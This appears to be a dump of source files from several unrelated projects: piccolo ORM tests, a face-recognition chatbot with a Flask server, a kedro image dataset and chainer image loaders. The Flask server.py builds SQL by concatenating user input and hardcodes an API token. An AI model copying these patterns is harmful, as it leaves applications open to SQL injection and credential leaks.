return extra_requirements
setup(
name="piccolo",
version=VERSION,
description=(
"A fast, user friendly ORM and query builder which supports asyncio."
),
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
author="<NAME>",
author_email="<EMAIL>",
python_requires=">=3.7.0",
url="https://github.com/piccolo-orm/piccolo",
packages=find_packages(exclude=("tests",)),
package_data={
"": [
"templates/*",
"templates/**/*",
"templates/**/**/*",
"templates/**/**/**/*",
],
"piccolo": ["py.typed"],
},
install_requires=parse_requirement("requirements.txt"),
extras_require=extras_require(),
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: Implementation :: CPython",
"Framework :: AsyncIO",
"Typing :: Typed",
"Topic :: Database",
],
entry_points={"console_scripts": ["piccolo = piccolo.main:main"]},
)
```
#### File: fixtures/commands/test_shared.py
```python
import datetime
import decimal
import uuid
from unittest import TestCase
from piccolo.apps.fixtures.commands.shared import (
FixtureConfig,
create_pydantic_fixture_model,
)
class TestShared(TestCase):
def test_shared(self):
pydantic_model = create_pydantic_fixture_model(
fixture_configs=[
FixtureConfig(
app_name="mega",
table_class_names=["MegaTable", "SmallTable"],
)
]
)
data = {
"mega": {
"SmallTable": [{"id": 1, "varchar_col": "Test"}],
"MegaTable": [
{
"id": 1,
"bigint_col": 1,
"boolean_col": True,
"bytea_col": b"hello",
"date_col": datetime.date(2021, 1, 1),
"foreignkey_col": 1,
"integer_col": 1,
"interval_col": datetime.timedelta(seconds=10),
"json_col": '{"a":1}',
"jsonb_col": '{"a": 1}',
"numeric_col": decimal.Decimal("1.10"),
"real_col": 1.100000023841858,
"smallint_col": 1,
"text_col": "hello",
"timestamp_col": datetime.datetime(2021, 1, 1, 0, 0),
"timestamptz_col": datetime.datetime(
2021, 1, 1, 0, 0, tzinfo=datetime.timezone.utc
),
"uuid_col": uuid.UUID(
"12783854-c012-4c15-8183-8eecb46f2c4e"
),
"varchar_col": "hello",
"unique_col": "hello",
"null_col": None,
"not_null_col": "hello",
}
],
}
}
model = pydantic_model(**data)
self.assertEqual(model.mega.SmallTable[0].id, 1)
self.assertEqual(model.mega.MegaTable[0].id, 1)
```
#### File: migrations/commands/test_check.py
```python
from unittest import TestCase
from unittest.mock import MagicMock, patch
from piccolo.apps.migrations.commands.check import CheckMigrationManager, check
from piccolo.conf.apps import AppRegistry
from piccolo.utils.sync import run_sync
class TestCheckMigrationCommand(TestCase):
@patch.object(
CheckMigrationManager,
"get_app_registry",
)
def test_check_migrations(self, get_app_registry: MagicMock):
get_app_registry.return_value = AppRegistry(
apps=["piccolo.apps.user.piccolo_app"]
)
# Make sure it runs without raising an exception:
run_sync(check())
```
#### File: tests/columns/test_jsonb.py
```python
from unittest import TestCase
from piccolo.columns.column_types import JSONB
from piccolo.table import Table
from ..base import postgres_only
class MyTable(Table):
json = JSONB()
@postgres_only
class TestJSONB(TestCase):
def setUp(self):
MyTable.create_table().run_sync()
def tearDown(self):
MyTable.alter().drop_table().run_sync()
def test_json(self):
"""
Test storing a valid JSON string.
"""
row = MyTable(json='{"a": 1}')
row.save().run_sync()
self.assertEqual(row.json, '{"a": 1}')
def test_arrow(self):
"""
Test using the arrow function to retrieve a subset of the JSON.
"""
MyTable(json='{"a": 1}').save().run_sync()
row = MyTable.select(MyTable.json.arrow("a")).first().run_sync()
self.assertEqual(row["?column?"], "1")
def test_arrow_as_alias(self):
"""
Test using the arrow function to retrieve a subset of the JSON.
"""
MyTable(json='{"a": 1}').save().run_sync()
row = (
MyTable.select(MyTable.json.arrow("a").as_alias("a"))
.first()
.run_sync()
)
self.assertEqual(row["a"], "1")
def test_arrow_where(self):
"""
Make sure the arrow function can be used within a WHERE clause.
"""
MyTable(json='{"a": 1}').save().run_sync()
self.assertEqual(
MyTable.count().where(MyTable.json.arrow("a") == "1").run_sync(), 1
)
self.assertEqual(
MyTable.count().where(MyTable.json.arrow("a") == "2").run_sync(), 0
)
def test_arrow_first(self):
"""
Make sure the arrow function can be used with the first clause.
"""
MyTable.insert(
MyTable(json='{"a": 1}'),
MyTable(json='{"b": 2}'),
).run_sync()
self.assertEqual(
MyTable.select(MyTable.json.arrow("a").as_alias("json"))
.first()
.run_sync(),
{"json": "1"},
)
```
#### File: tests/columns/test_json.py
```python
from unittest import TestCase
from piccolo.columns.column_types import JSON
from piccolo.table import Table
class MyTable(Table):
json = JSON()
class MyTableDefault(Table):
"""
Test the different default types.
"""
json = JSON()
json_str = JSON(default="{}")
json_dict = JSON(default={})
json_list = JSON(default=[])
json_none = JSON(default=None, null=True)
class TestJSONSave(TestCase):
def setUp(self):
MyTable.create_table().run_sync()
def tearDown(self):
MyTable.alter().drop_table().run_sync()
def test_json_string(self):
"""
Test storing a valid JSON string.
"""
row = MyTable(json='{"a": 1}')
row.save().run_sync()
self.assertEqual(
MyTable.select(MyTable.json)
.first()
.run_sync()["json"]
.replace(" ", ""),
'{"a":1}',
)
def test_json_object(self):
"""
Test storing a valid JSON object.
"""
row = MyTable(json={"a": 1})
row.save().run_sync()
self.assertEqual(
MyTable.select(MyTable.json)
.first()
.run_sync()["json"]
.replace(" ", ""),
'{"a":1}',
)
class TestJSONDefault(TestCase):
def setUp(self):
MyTableDefault.create_table().run_sync()
def tearDown(self):
MyTableDefault.alter().drop_table().run_sync()
def test_json_default(self):
row = MyTableDefault()
row.save().run_sync()
self.assertEqual(row.json, "{}")
self.assertEqual(row.json_str, "{}")
self.assertEqual(row.json_dict, "{}")
self.assertEqual(row.json_list, "[]")
self.assertEqual(row.json_none, None)
def test_invalid_default(self):
with self.assertRaises(ValueError):
for value in ("a", 1, ("x", "y", "z")):
JSON(default=value)
class TestJSONInsert(TestCase):
def setUp(self):
MyTable.create_table().run_sync()
def tearDown(self):
MyTable.alter().drop_table().run_sync()
def check_response(self):
self.assertEqual(
MyTable.select(MyTable.json)
.first()
.run_sync()["json"]
.replace(" ", ""),
'{"message":"original"}',
)
def test_json_string(self):
"""
Test inserting using a string.
"""
row = MyTable(json='{"message": "original"}')
MyTable.insert(row).run_sync()
self.check_response()
def test_json_object(self):
"""
Test inserting using an object.
"""
row = MyTable(json={"message": "original"})
MyTable.insert(row).run_sync()
class TestJSONUpdate(TestCase):
def setUp(self):
MyTable.create_table().run_sync()
def tearDown(self):
MyTable.alter().drop_table().run_sync()
def add_row(self):
row = MyTable(json={"message": "original"})
row.save().run_sync()
def check_response(self):
self.assertEqual(
MyTable.select(MyTable.json)
.first()
.run_sync()["json"]
.replace(" ", ""),
'{"message":"updated"}',
)
def test_json_update_string(self):
"""
Test updating a JSON field using a string.
"""
self.add_row()
MyTable.update({MyTable.json: '{"message": "updated"}'}).run_sync()
self.check_response()
def test_json_update_object(self):
"""
Test updating a JSON field using an object.
"""
self.add_row()
MyTable.update({MyTable.json: {"message": "updated"}}).run_sync()
self.check_response()
```
#### File: tests/columns/test_timestamptz.py
```python
import datetime
from unittest import TestCase
from dateutil import tz
from piccolo.columns.column_types import Timestamptz
from piccolo.columns.defaults.timestamptz import (
TimestamptzCustom,
TimestamptzNow,
TimestamptzOffset,
)
from piccolo.table import Table
class MyTable(Table):
created_on = Timestamptz()
class MyTableDefault(Table):
"""
A table containing all of the possible `default` arguments for
`Timestamptz`.
"""
created_on = Timestamptz(default=TimestamptzNow())
created_on_offset = Timestamptz(default=TimestamptzOffset(days=1))
created_on_custom = Timestamptz(default=TimestamptzCustom(year=2021))
created_on_datetime = Timestamptz(
default=datetime.datetime(year=2020, month=1, day=1)
)
class CustomTimezone(datetime.tzinfo):
pass
class TestTimestamptz(TestCase):
def setUp(self):
MyTable.create_table().run_sync()
def tearDown(self):
MyTable.alter().drop_table().run_sync()
def test_timestamptz_timezone_aware(self):
"""
Test storing a timezone aware timestamp.
"""
for tzinfo in (
datetime.timezone.utc,
tz.gettz("America/New_York"),
):
created_on = datetime.datetime(
year=2020,
month=1,
day=1,
hour=12,
minute=0,
second=0,
tzinfo=tzinfo,
)
row = MyTable(created_on=created_on)
row.save().run_sync()
# Fetch it back from the database
result = (
MyTable.objects()
.where(
MyTable._meta.primary_key
== getattr(row, MyTable._meta.primary_key._meta.name)
)
.first()
.run_sync()
)
self.assertEqual(result.created_on, created_on)
# The database converts it to UTC
self.assertEqual(result.created_on.tzinfo, datetime.timezone.utc)
class TestTimestamptzDefault(TestCase):
def setUp(self):
MyTableDefault.create_table().run_sync()
def tearDown(self):
MyTableDefault.alter().drop_table().run_sync()
def test_timestamptz_default(self):
"""
Make sure the default value gets created, and can be retrieved.
"""
created_on = datetime.datetime.now(tz=datetime.timezone.utc)
row = MyTableDefault()
row.save().run_sync()
result = MyTableDefault.objects().first().run_sync()
delta = result.created_on - created_on
self.assertTrue(delta < datetime.timedelta(seconds=1))
self.assertEqual(result.created_on.tzinfo, datetime.timezone.utc)
```
#### File: music/piccolo_migrations/2021-07-25T22-38-48-009306.py
```python
from enum import Enum
from piccolo.apps.migrations.auto import MigrationManager
from piccolo.columns.column_types import JSON, JSONB, Varchar
from piccolo.columns.indexes import IndexMethod
ID = "2021-07-25T22:38:48:009306"
VERSION = "0.26.0"
async def forwards():
manager = MigrationManager(migration_id=ID, app_name="music")
manager.add_table("Shirt", tablename="shirt")
manager.add_table("RecordingStudio", tablename="recording_studio")
manager.add_column(
table_class_name="Shirt",
tablename="shirt",
column_name="size",
column_class_name="Varchar",
column_class=Varchar,
params={
"length": 1,
"default": "l",
"null": False,
"primary": False,
"key": False,
"unique": False,
"index": False,
"index_method": IndexMethod.btree,
"choices": Enum(
"Size", {"small": "s", "medium": "m", "large": "l"}
),
},
)
manager.add_column(
table_class_name="RecordingStudio",
tablename="recording_studio",
column_name="facilities",
column_class_name="JSON",
column_class=JSON,
params={
"default": "{}",
"null": False,
"primary": False,
"key": False,
"unique": False,
"index": False,
"index_method": IndexMethod.btree,
"choices": None,
},
)
manager.add_column(
table_class_name="RecordingStudio",
tablename="recording_studio",
column_name="facilities_b",
column_class_name="JSONB",
column_class=JSONB,
params={
"default": "{}",
"null": False,
"primary": False,
"key": False,
"unique": False,
"index": False,
"index_method": IndexMethod.btree,
"choices": None,
},
)
return manager
```
#### File: table/instance/test_get_related_readable.py
```python
from tests.base import DBTestCase
from tests.example_apps.music.tables import Band
class TestGetRelatedReadable(DBTestCase):
def test_get_related_readable(self):
"""
Make sure you can get the `Readable` representation for related object
from another object instance.
"""
self.insert_row()
response = Band.select(
Band.name, Band._get_related_readable(Band.manager)
).run_sync()
self.assertEqual(
response, [{"name": "Pythonistas", "manager_readable": "Guido"}]
)
# TODO Need to make sure it can go two levels deep ...
# e.g. Concert._get_related_readable(Concert.band_1.manager)
```
#### File: tests/table/test_count.py
```python
from tests.example_apps.music.tables import Band
from ..base import DBTestCase
class TestCount(DBTestCase):
def test_exists(self):
self.insert_rows()
response = Band.count().where(Band.name == "Pythonistas").run_sync()
self.assertTrue(response == 1)
```
#### File: tests/table/test_metaclass.py
```python
from unittest import TestCase
from piccolo.columns import Secret
from piccolo.columns.column_types import JSON, JSONB, ForeignKey
from piccolo.table import Table
from tests.example_apps.music.tables import Band
class TestMetaClass(TestCase):
def test_tablename(self):
self.assertEqual(Band._meta.tablename, "band")
def test_protected_table_names(self):
"""
Some tablenames are forbidden because they're reserved words in the
database, and can potentially cause issues.
"""
with self.assertRaises(ValueError):
class User(Table):
pass
with self.assertRaises(ValueError):
class MyUser(Table, tablename="user"):
pass
def test_help_text(self):
"""
Make sure help_text can be set for the Table.
"""
help_text = "The manager of a band."
class Manager(Table, help_text=help_text):
pass
self.assertEqual(Manager._meta.help_text, help_text)
def test_foreign_key_columns(self):
"""
Make sure TableMeta.foreign_keys and TableMeta.foreign_key_references
are setup correctly.
"""
class TableA(Table):
pass
class TableB(Table):
table_a = ForeignKey(references=TableA)
self.assertEqual(TableB._meta.foreign_key_columns, [TableB.table_a])
self.assertEqual(TableA._meta.foreign_key_references, [TableB.table_a])
def test_secret_columns(self):
"""
Make sure TableMeta.secret_columns are setup correctly.
"""
class Classified(Table):
top_secret = Secret()
self.assertEqual(
Classified._meta.secret_columns, [Classified.top_secret]
)
def test_json_columns(self):
"""
Make sure TableMeta.json_columns are setup correctly.
"""
class MyTable(Table):
column_a = JSON()
column_b = JSONB()
self.assertEqual(
MyTable._meta.json_columns, [MyTable.column_a, MyTable.column_b]
)
def test_id_column(self):
"""
Makes sure an id column is added.
"""
class TableA(Table):
pass
self.assertTrue(hasattr(TableA, "id"))
```
#### File: piccolo/tests/test_main.py
```python
from unittest import TestCase
from piccolo.main import main
class TestMain(TestCase):
def test_main(self):
# Just make sure it runs without raising any errors.
main()
```
#### File: tests/utils/test_lazy_loader.py
```python
from unittest import TestCase, mock
from piccolo.utils.lazy_loader import LazyLoader
from tests.base import postgres_only, sqlite_only
class TestLazyLoader(TestCase):
def test_lazy_loading_database_driver(self):
_ = LazyLoader("asyncpg", globals(), "asyncpg")
@postgres_only
def test_lazy_loader_asyncpg_exception(self):
lazy_loader = LazyLoader("asyncpg", globals(), "asyncpg.connect")
with mock.patch("asyncpg.connect") as module:
module.side_effect = ModuleNotFoundError()
with self.assertRaises(ModuleNotFoundError):
lazy_loader._load()
@sqlite_only
def test_lazy_loader_aiosqlite_exception(self):
lazy_loader = LazyLoader("aiosqlite", globals(), "aiosqlite.connect")
with mock.patch("aiosqlite.connect") as module:
module.side_effect = ModuleNotFoundError()
with self.assertRaises(ModuleNotFoundError):
lazy_loader._load()
``` |
{
"source": "0Shark/SindiAIDev",
"score": 3
} |
#### File: 0Shark/SindiAIDev/face_recon.py
```python
import face_recognition
import cv2
import numpy as np
def webcam_detection(known_image, display_name):
# Get a reference to webcam #0 (the default one)
video_capture = cv2.VideoCapture(0)
# Load a sample picture and learn how to recognize it.
known_face_encoding = face_recognition.face_encodings(known_image)[0]
# Create arrays of known face encodings and their names
known_face_encodings = [
known_face_encoding
]
known_face_names = [
display_name
]
# Initialize some variables
face_locations = []
face_encodings = []
face_names = []
process_this_frame = True
while True:
# Grab a single frame of video
ret, frame = video_capture.read()
# Resize frame of video to 1/4 size for faster face recognition processing
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
# Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)
rgb_small_frame = small_frame[:, :, ::-1]
# Only process every other frame of video to save time
if process_this_frame:
# Find all the faces and face encodings in the current frame of video
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
face_names = []
for face_encoding in face_encodings:
# See if the face is a match for the known face(s)
matches = face_recognition.compare_faces(known_face_encodings, face_encoding)
name = "Unknown user"
# # If a match was found in known_face_encodings, just use the first one.
# if True in matches:
# first_match_index = matches.index(True)
# name = known_face_names[first_match_index]
# Or instead, use the known face with the smallest distance to the new face
face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)
best_match_index = np.argmin(face_distances)
if matches[best_match_index]:
name = known_face_names[best_match_index]
return True
face_names.append(name)
process_this_frame = not process_this_frame
# Display the resulting image
# cv2.imshow('SindiAI-Detector', frame)
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.release()
cv2.destroyAllWindows()
```
#### File: 0Shark/SindiAIDev/server.py
```python
from flask import Flask, render_template, request
import pymysql
import utils
from pyowm import OWM
# OpenWeather
weatherAPI_token = "44edc82d5c54a7d0cd68aec1904e810e"
mgr = OWM(weatherAPI_token)
# initializing variables
s = 0
q = 0
facehash = ""
app = Flask(__name__)
def insert_sql(user_input): # inserting user inputs, bot outputs and time into database
global s
global facehash
s = s + 1 # ID
resp = utils.giveInput(user_input, facehash)
resp = str(resp)
try:
sql = 'INSERT INTO user_bot_chat (id, User_input, Bot_output) VALUES("' + str(
s) + '","' + user_input + '","' + resp + '");'
a.execute(sql)
conn.commit()
except Exception as e:
print("Line 27")
print("Exeception occured:{}".format(e))
def user_list(): # extracting user inputs from user_bot_chat database
user = []
sql = 'select User_input from user_bot_chat;'
a.execute(sql)
w_user = list(a.fetchall())
for i in w_user:
# user.append('You: ' + i[0])
user.append(i[0])
return user
def bot_list(): # extracting bot responses from user_bot_chat database
bot = []
sql = 'select Bot_output from user_bot_chat;'
a.execute(sql)
w_bot = list(a.fetchall())
for i in w_bot:
# bot.append('Sindi' + i[0])
bot.append(i[0])
return bot
@app.route('/home') # links to the first page - index.html
def index():
weather = getWeather()
return render_template("index.html", user_input=r(), temp=weather[0], location=weather[1], icon=weather[2], humidity=weather[3], wind=weather[4], music=utils.music_playing())
@app.route('/') # links to the first page - index.html
def home():
return render_template("setup.html")
@app.route('/setup', methods=['POST'])
def setup():
weather = getWeather()
global facehash
facehash= request.form["facehash"]
return render_template("index.html", user_input=r(), temp=weather[0], location=weather[1], icon=weather[2], humidity=weather[3], wind=weather[4], music=utils.music_playing())
@app.route('/clear')
def clearChat():
weather = getWeather()
# Clear all table rows
sql = "TRUNCATE TABLE user_bot_chat;"
a.execute(sql)
return render_template("index.html", user_input=r(), temp=weather[0], location=weather[1], icon=weather[2], humidity=weather[3], wind=weather[4], music=utils.music_playing())
def r(): # takes user inputs and bot outputs and insert into a array to later send to html file
try:
user_input = request.form["user_input"]
insert_sql(user_input)
r = []
user = user_list()
bot = bot_list()
for j in range(0, len(user)):
r.append(user[j])
r.append(bot[j])
return r
except:
r = []
user = user_list()
bot = bot_list()
for j in range(0, len(user)):
r.append(user[j])
r.append(bot[j])
return r
def getWeather():
observation = mgr.weather_at_place('Tirana')
w = observation.get_weather()
wind_data = w.get_wind()
humidity = w.get_humidity()
temp_data = w.get_temperature('celsius')
icon = w.get_weather_icon_name()
weatherData = [str(int(temp_data['temp'])), 'Tirana', str(icon), str(int(humidity)), str(int(wind_data['speed']))]
return weatherData
@app.route('/process', methods=['POST'])
def process():
weather = getWeather()
# called when user input is given and submit button is pressed
return render_template("index.html", user_input=r(), temp=weather[0], location=weather[1], icon=weather[2], humidity=weather[3], wind=weather[4], music=utils.music_playing())
if __name__ == '__main__':
try: # connects to the database
conn = pymysql.connect(host='localhost', user='root', password='', db='sindi_db')
a = conn.cursor()
except Exception as e:
print("QUERY ERROR: Connection")
print("Exeception occured:{}".format(e))
app.run(host='0.0.0.0', port=int('8000'), debug=True) # 0.0.0.0.,80
# conn.close()
# a.close()
``` |
{
"source": "0shimax/backtest-example",
"score": 3
} |
#### File: datasets/image/image_dataset.py
```python
from pathlib import PurePosixPath
from typing import Any, Dict
import fsspec
import numpy as np
from PIL import Image
from kedro.io import AbstractDataSet
from kedro.io.core import get_filepath_str, get_protocol_and_path
class ImageDataSet(AbstractDataSet):
"""``ImageDataSet`` loads / save image data from a given filepath as `numpy` array using Pillow.
ref: https://kedro.readthedocs.io/en/stable/07_extend_kedro/03_custom_datasets.html
Example:
::
>>> ImageDataSet(filepath='/img/file/path.png')
"""
def __init__(self, filepath: str):
"""Creates a new instance of ImageDataSet to load / save image data for given filepath.
Args:
filepath: The location of the image file to load / save data.
"""
protocol, path = get_protocol_and_path(filepath)
self._protocol = protocol
self._filepath = PurePosixPath(path)
self._fs = fsspec.filesystem(self._protocol)
def _load(self) -> np.ndarray:
"""Loads data from the image file.
Returns:
Data from the image file as a numpy array
"""
load_path = get_filepath_str(self._filepath, self._protocol)
with self._fs.open(load_path, mode="r") as f:
image = Image.open(f).convert("RGBA")
return np.asarray(image)
def _save(self, data: np.ndarray) -> None:
"""Saves image data to the specified filepath."""
save_path = get_filepath_str(self._filepath, self._protocol)
with self._fs.open(save_path, mode="wb") as f:
image = Image.fromarray(data)
image.save(f)
def _describe(self) -> Dict[str, Any]:
"""Returns a dict that describes the attributes of the dataset."""
return dict(filepath=self._filepath, protocol=self._protocol)
``` |
{
"source": "0shimax/chainer-feedbacknet",
"score": 2
} |
#### File: common/image_processor/mini_batch_loader.py
```python
import os, sys
sys.path.append('./src/common/image_processor')
sys.path.append('./src/common/text_processor')
sys.path.append('./src/common/image_processor/feature_extractor')
import chainer
import cv2
import numpy as np
np.random.seed(555)
from contextlib import ExitStack
import numbers
from image_normalizer import ImageNormalizer
from tokenizer import Tokenizer
from feature_extractor_utils import show_image
from cell_diameters import compute_cell_diameter
from nucleus_diamiters import compute_nucleus_diameter
class DatasetPreProcessor(chainer.dataset.DatasetMixin):
def __init__(self, args):
"""args type is EasyDict class
"""
labels = list('ABCDEFGHIJKLMNOPQRS')
self.label2clsval = {l:i for i,l in enumerate(labels)}
self.args = args
self.gray = args.converse_gray
self.image_normalizer = ImageNormalizer()
self.pairs = self.read_paths()
self.counter = 0
self.image_size_in_batch = [None, None] # height, width
if args.generate_comment:
self.inputs_tokens = self.compute_token_ids() # return numpy array
def __len__(self):
return len(self.pairs)
def read_paths(self):
path_label_pairs = []
for image_path, label in self.path_label_pair_generator():
if not label.isdigit() and not label=='-1':
label = self.label2clsval[label]
path_label_pairs.append((image_path, label))
return path_label_pairs
def path_label_pair_generator(self):
with ExitStack () as stack:
f_image = stack.enter_context(open(self.args.image_pointer_path, 'r'))
f_label = stack.enter_context(open(self.args.labels_file_path, 'r'))
for image_file_name, label in zip(f_image, f_label):
image_file_name = image_file_name.rstrip()
image_full_path = os.path.join(self.args.image_dir_path, image_file_name)
if os.path.isfile(image_full_path):
yield image_full_path, label.rstrip()
else:
raise RuntimeError("file is not fined: {}.".format(image_full_path))
def __init_batch_counter(self):
if self.args.train and self.counter==self.args.training_params.batch_size:
self.counter = 0
self.image_size_in_batch = [None, None]
def __set_image_size_in_batch(self, image):
if self.counter==1:
resized_h, resized_w = image.shape[:2]
self.image_size_in_batch = [resized_h, resized_w]
def get_example(self, index):
self.counter += 1
if self.args.debug_mode:
if self.counter>15:
assert False, 'stop test'
path, label = self.pairs[index]
image = cv2.imread(path)
src_image = image.copy()
if self.args.debug_mode:
show_image(image)
# cv2.imwrite("/Users/naoki_shimada/Downloads/Origin.jpg", image)
# gray transform if converse_gray is True
image = self.color_trancefer(image)
h, w, ch = image.shape
if image is None:
raise RuntimeError("invalid image: {}".format(path))
# resizing image
if self.args.do_resize:
if self.counter>1:
# augmentas is ordered w,h in resize method of openCV
scale = self.image_size_in_batch[1]/w, self.image_size_in_batch[0]/h
image = self.resize_image(image, scale)
else:
image = self.resize_image(image)
elif self.args.crop_params.flag:
image = self.crop_image(image)
# augmentat image
if self.args.aug_params.do_augment:
image = self.augment_image(image)
if self.args.debug_mode:
u_image = image.astype(np.uint8)
show_image(u_image)
cv2.imwrite("/Users/naoki_shimada/Downloads/{}".format(os.path.basename(path)), u_image)
print(image.shape)
print('label:', label)
# assert False, 'terminate'
# store image size
# because dimension must be equeal per batch
self.__set_image_size_in_batch(image)
# image normalize
image = getattr(self.image_normalizer, \
self.args.im_norm_type.method)(image, self.args.im_norm_type.opts)
if self.args.debug_mode:
u_image = image.astype(np.uint8)
show_image(u_image)
# cv2.imwrite("/Users/naoki_shimada/Downloads/GCN.jpg", show_image)
print(image.shape)
print('label:', label)
# assert False, 'terminate'
if self.args.detect_edge:
edges = self.detect_edge(image)
if self.args.debug_mode:
u_image = edges.reshape(edges.shape[0], edges.shape[1]).astype(np.uint8)
show_image(u_image)
image = cv2.merge((image, edges))
# transpose for chainer
image = image.transpose(2, 0, 1)
# initialize batch counter
self.__init_batch_counter()
batch_inputs = image.astype(np.float32), np.array(label, dtype=np.int32)
if self.args.with_feature_val:
cell_diameter = \
compute_cell_diameter(src_image, debug=self.args.debug_mode)
min_nucleus_diameter, max_nucleus_diameter = \
compute_nucleus_diameter(src_image, debug=self.args.debug_mode)
features = np.array( \
[cell_diameter, min_nucleus_diameter, max_nucleus_diameter],
dtype=np.float32)
batch_inputs += (features, )
if self.args.generate_comment:
batch_inputs += (self.inputs_tokens[index], )
return batch_inputs
def color_trancefer(self, image):
h, w, _ = image.shape
if self.args.converse_gray:
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY).reshape((h,w,1))
else:
image = image.astype(np.float32)
return image
def augment_image(self, image):
if self.args.aug_params.params.do_scale and self.counter==1:
image = self.scaling(image)
if self.args.aug_params.params.do_flip:
image = self.flip(image)
if self.args.aug_params.params.change_britghtness:
image = self.random_brightness(image)
if self.args.aug_params.params.change_contrast:
image = self.random_contrast(image)
if self.args.aug_params.params.do_rotate:
image = self.rotate_image(image)
if self.args.aug_params.params.do_shift:
image = self.shift_image(image)
if self.args.aug_params.params.do_blur:
image = self.random_blur(image)
return image
def resize_image(self, image, scale=None):
xh, xw = image.shape[:2]
if scale is None:
# if scale is not difinded, calculate scale as closest multiple number.
h_scale = (xh//self.args.multiple)*self.args.multiple/xh
w_scale = (xw//self.args.multiple)*self.args.multiple/xw
scale = w_scale, h_scale
elif isinstance(scale, numbers.Number):
scale = scale, scale
elif isinstance(scale, tuple) and len(scale)>2:
raise RuntimeError("Error occurred with variable ot scale in resize_image method")
new_sz = (int(xw*scale[0])+1, int(xh*scale[1])+1) # specification of opencv, argments is recepted (w, h)
image = cv2.resize(image, new_sz)
xh, xw = image.shape[:2]
m0, m1 = xh % self.args.multiple, xw % self.args.multiple
d0, d1 = np.random.randint(m0+1), np.random.randint(m1+1)
image = image[d0:(image.shape[0] - m0 + d0), d1:(image.shape[1] - m1 + d1)]
if len(image.shape)==2:
return image.reshape((image.shape[0], image.shape[1], 1))
else:
return image
def flip(self, image):
do_flip_xy = np.random.randint(0, 2)
do_flip_x = np.random.randint(0, 2)
do_flip_y = np.random.randint(0, 2)
if do_flip_xy: # Transpose X and Y axis
image = image[::-1, ::-1, :]
elif do_flip_x: # Flip along Y-axis
image = image[::-1, :, :]
elif do_flip_y: # Flip along X-axis
image = image[:, ::-1, :]
return image
def scaling(self, image):
do_scale = np.random.randint(0, 2)
if do_scale:
scale = self.args.aug_params.params.scale[ \
np.random.randint(0,len(self.args.aug_params.params.scale))]
return self.resize_image(image, scale)
else:
return image
def random_brightness(self, image, lower=0.2, upper=2.0, seed=None):
brightness_flag = np.random.randint(0, 2)
if brightness_flag:
h, w, ch = image.shape
gamma = np.random.uniform(lower, upper)
image = 255 * np.power(image, 1.0/gamma)*255**(-1.0/gamma)
return self.__reshpe_channel(image, (h,w,ch))
else:
return image
def random_contrast(self, image, lower=1.0, upper=20.0, seed=None):
def __change(one_channel):
f = np.random.uniform(lower, upper)
return 255.0/(1+np.exp(-f*(one_channel-128)/255))
# mean = one_channel.mean()
# max_val = one_channel.max()
# return max_val/(1+np.exp(-f*(one_channel-mean)/max_val))
# return (one_channel - mean) * f + mean
contrast_flag = np.random.randint(0, 2)
if contrast_flag:
h, w, ch = image.shape
image = cv2.merge(tuple(__change(d_ch) for d_ch in cv2.split(image)))
return self.__reshpe_channel(image, (h,w,ch))
else:
return image
def shift_image(self, image):
do_shift_xy = np.random.randint(0, 2)
do_shift_x = np.random.randint(0, 2)
do_shift_y = np.random.randint(0, 2)
if do_shift_xy:
lr_shift = self.args.aug_params.params.lr_shift[ \
np.random.randint(0,len(self.args.aug_params.params.lr_shift))]
ud_shift = self.args.aug_params.params.ud_shift[ \
np.random.randint(0,len(self.args.aug_params.params.ud_shift))]
elif do_shift_y:
lr_shift = 0
ud_shift = self.args.aug_params.params.ud_shift[ \
np.random.randint(0,len(self.args.aug_params.params.ud_shift))]
elif do_shift_x:
lr_shift = self.args.aug_params.params.lr_shift[ \
np.random.randint(0,len(self.args.aug_params.params.lr_shift))]
ud_shift = 0
if do_shift_xy or do_shift_y or do_shift_y:
h, w, ch = image.shape
affine_matrix = np.float32([[1,0,lr_shift],[0,1,ud_shift]]) # 横、縦
image = cv2.warpAffine(image, affine_matrix, (w,h))
return self.__reshpe_channel(image, (h,w,ch))
else:
return image
def rotate_image(self, image):
do_rotate = np.random.randint(0, 2)
if do_rotate:
h, w, ch = image.shape
rotation_angle = self.args.aug_params.params.rotation_angle[ \
np.random.randint(0,len(self.args.aug_params.params.rotation_angle))]
affine_matrix = cv2.getRotationMatrix2D((h/2, w/2), rotation_angle, 1)
image = cv2.warpAffine(image, affine_matrix, (w,h))
return self.__reshpe_channel(image, (h,w,ch))
else:
return image
def random_blur(self, image, average_square=None):
do_blur = np.random.randint(0, 2)
if do_blur:
h, w, ch = image.shape
# the larger the number, the blurred.
# original: (25, 25)
average_square = (10, 10) if average_square is None else average_square
# calculate moving average and output
image = cv2.blur(image, average_square)
return self.__reshpe_channel(image, (h,w,ch))
else:
return image
def crop_image(self, image):
h, w, ch = image.shape
top = int((w-self.args.crop_params.size)/2)
left = int((h-self.args.crop_params.size)/2)
return image[left:left+self.args.crop_params.size,top:top+self.args.crop_params.size,:]
def __reshpe_channel(self, image, im_shape ):
if len(image.shape)==2:
return image.reshape(im_shape)
else:
return image
def compute_token_ids(self):
parser = Tokenizer(self.args.token_args)
return parser.token2id()
def detect_edge(self, image):
h, w, ch = image.shape
# to gray
if ch==3:
gray_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY).reshape((h,w,1))
else:
gray_img = image
# edge images respectively
return cv2.Canny(gray_img, 32, 64) # (50, 110), (128, 128)
``` |
{
"source": "0shimax/chainer-learning-to-remember-rare-events",
"score": 2
} |
#### File: evaluator/visualizer/attention_visualizer.py
```python
import sys, os
sys.path.append('./src/common')
sys.path.append('./src/common/image_processor')
sys.path.append('./src/net')
sys.path.append('./experiment_settings')
from mini_batch_loader import DatasetPreProcessor
from visualization_settings import get_args
from trainer_utils import EasyTrainer
import chainer
from chainer import Variable, cuda
import numpy as np
import cv2
from itertools import product
from math import ceil, floor
class AttentionVisualizer(object):
"""
see OBJECT DETECTORS EMERGE IN DEEP SCENE CNNs, Zhou+, '15
